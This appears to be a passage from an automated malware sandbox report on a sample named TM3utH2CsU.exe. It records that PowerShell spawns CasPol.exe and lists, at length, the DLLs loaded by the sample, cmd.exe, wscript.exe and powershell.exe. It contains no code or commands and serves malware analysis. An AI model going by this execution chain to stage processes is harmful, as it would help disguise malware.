Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: cryptnet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasapi32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasman.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rtutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winhttp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ondemandconnroutehelper.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc6.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winnsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: schannel.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mskeyprotect.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ntasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncrypt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncryptsslp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasapi32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasman.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rtutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winhttp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ondemandconnroutehelper.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
|
